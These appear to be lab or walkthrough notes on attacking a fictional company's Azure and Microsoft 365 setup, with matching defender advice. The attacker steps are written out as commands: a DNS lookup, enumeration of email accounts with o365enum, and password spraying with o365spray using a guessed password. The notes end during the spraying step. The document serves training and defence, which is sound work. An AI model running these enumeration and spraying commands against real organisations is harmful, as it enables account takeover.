Abuse Azure Logic App Automation

Notes¶

Attacker’s Perspective:
- Action: Found sensitive information (e.g., DevTeamVM IP, Azure Subscription ID) in a LinkedIn post screenshot.
- Rationale: Public social media posts often inadvertently leak sensitive organizational data.
- Commands:
  - Research DNS records for company infrastructure:
```
dig megabigtech.com +noall +answer ANY
```
  - Extract email formats and infrastructure insights.
  - Defender’s Perspective:
- Vulnerability: Employees sharing sensitive screenshots or posts online.
- Prevention:
  - Conduct regular security awareness training focusing on social media practices.
  - Implement Data Loss Prevention (DLP) solutions to monitor and block sensitive data exposure.
  - Use image-scanning tools to detect sensitive information in public posts.
- Remediation:
  - Take down the post.
  - Conduct a risk assessment on exposed information.

Attacker’s Perspective:
- Action: Verified email existence using enumeration tools.
- Tool: o365enum.
- Command:
```
python3 o365enum.py -u email.txt -m office.com
```
- Rationale: To confirm a valid attack target by enumerating Microsoft 365 email accounts.
- Defender’s Perspective:
- Vulnerability: Misconfigured Microsoft 365 responses revealing account existence.
- Prevention:
  - Enable Azure AD Smart Lockout to block repeated enumeration attempts.
  - Use Conditional Access to limit access from suspicious IP ranges.
- Remediation:
  - Review and enforce email address verification throttling.
  - Monitor login activity for abnormal patterns.

Attacker’s Perspective:
- Action: Used likely passwords (e.g., superRyan!) derived from the OSINT findings.
- Tool: o365spray.
- Command:
```
python3 o365spray.py --username [email protected] --passfile passwords.txt --domain megabigtech.com --lockout 
```
  Links¶

https://learn.microsoft.com/en-us/connectors/office365users/#get-manager-(v2)